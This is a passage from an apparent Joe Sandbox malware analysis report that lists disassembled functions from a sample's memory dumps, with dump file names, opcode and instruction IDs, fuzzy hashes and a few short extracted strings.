                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 7r\z
                                  • API String ID: 0-3172149568
                                  • Opcode ID: 66bc79f5f588736e1266af03f574e9a972ae9e08b4ba97292e93ccaf4c7d8d75
                                  • Instruction ID: e3b1042484df4bef4f0a4ccd1c4504f956dd4a3c06137ae98d054e1ae70a0269
                                  • Opcode Fuzzy Hash: 66bc79f5f588736e1266af03f574e9a972ae9e08b4ba97292e93ccaf4c7d8d75
                                  • Instruction Fuzzy Hash: 391229F3A0C610AFE3106E2DEC8577AFBE5EF94760F1A853DEAC493744E53558048692
                                  Function 00C0E258 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: UNC\
                                  • API String ID: 0-505053535
                                  • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                  • Instruction ID: 95b90b4365f5995f78cd1535ab639a5b8aa690808c0d290ffeb37f6fe4c82ccf
                                  • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                  • Instruction Fuzzy Hash: 92E15B71D442698EEB10CF59C8843BEBFF2AB85314F19C569D4B46B2D2D3368E46CB90
                                  Function 00F9B6CF Relevance: 1.5, Strings: 1, Instructions: 204COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: r:e
                                  • API String ID: 0-806617135
                                  • Opcode ID: 77779777c0340656b4eb52415c3c73551c9d4997e4d5d461e2102b9bc204d729
                                  • Instruction ID: d45ef2b37f4784928042b3dccc4233814ec6d8a23dbcb670086030c76023c82f
                                  • Opcode Fuzzy Hash: 77779777c0340656b4eb52415c3c73551c9d4997e4d5d461e2102b9bc204d729
                                  • Instruction Fuzzy Hash: 55510BF3E081109BF304AA2DDC8576AF7E5EBD4320F1A853DEAC8D3744E9395C168696
                                  Function 00BCE544 Relevance: .8, Instructions: 823COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                  • Instruction ID: 59ad592c4a40935bc71ac57e7b4cb3ee74775818b68691deece13f83342f9b1d
                                  • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                  • Instruction Fuzzy Hash: 4082F0B5900F458FD365CF29C880BA2B7E1BF4A300F548A6ED9EA9B751DB30B945CB50
                                  Function 00BE8E78 Relevance: .6, Instructions: 649COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                  • Instruction ID: 3149d8f4c3a72e0259cf855d3519ce99d226bd40fbd112e26c18735cb1b0bc7d
                                  • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                  • Instruction Fuzzy Hash: ED4281706047818FD725CF1AC094765FBE2FF95314F288AAEC49A8B792D735E889CB50
                                  Function 00C1AC28 Relevance: .5, Instructions: 501COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                  • Instruction ID: 370a48ab052df08018a50b544e7aa19de05bca3f7329326b3c5dc20112a721c6
                                  • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                  • Instruction Fuzzy Hash: 8202F571E002168FCB11CF69C8906EFB7E2AF9A350F16831AE815B7751D771AD829BD0
                                  Function 00BF98B8 Relevance: .5, Instructions: 482COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                  • Instruction ID: d4dcff19ab56e7da53d89a521c45577f1285cebc5086ae3999303cf73968dee0
                                  • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                  • Instruction Fuzzy Hash: BA022F74A083098FDB14CF29C880379B7E1EFA5340F15C76EEA9997362D371E8898B41
                                  Function 00BE66C8 Relevance: .4, Instructions: 418COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                  • Instruction ID: 43e160da447e05eeed344131c3da2c26d27ed1edaa04bb0c5b06f2c5be2229ad
                                  • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                  • Instruction Fuzzy Hash: F6F16B6260C6E14BC71D9A2584F08BD7FD29BA9201F0E86ADFDD70F393DA24DA01DB51
                                  Function 00C2B308 Relevance: .4, Instructions: 415COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                  • Instruction ID: e198ea5da5367e9396aebfe847357002d3dd2cbe77473a24ec5190fd4341daeb
                                  • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                  • Instruction Fuzzy Hash: AED17873F10A254BEB08CE99DC913ADB6E2EBD8350F19413ED916F7781D6B89D018790
                                  Function 00C10B88 Relevance: .4, Instructions: 378COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                  • Instruction ID: 400551ce8daf74a00a08ba2a537e7a1584714772df23d94c39232d04d6df31df
                                  • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                  • Instruction Fuzzy Hash: C3D1F571E002198FDF24CF98C8817EEB7B1BF4A310F248229E965A7291D7745DC6EB91
                                  Function 00BFB8A8 Relevance: .4, Instructions: 376COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                  • Instruction ID: 31a0cf2cbf98dde183a0c749aa034731945bba13cbed119fcb3da049a147a1a2
                                  • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                  • Instruction Fuzzy Hash: C7027974E006598FCF16CFA8C4909EDBBF6FF89310F548199E8896B355C730AA95CB50
                                  Function 00BFBD68 Relevance: .4, Instructions: 372COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
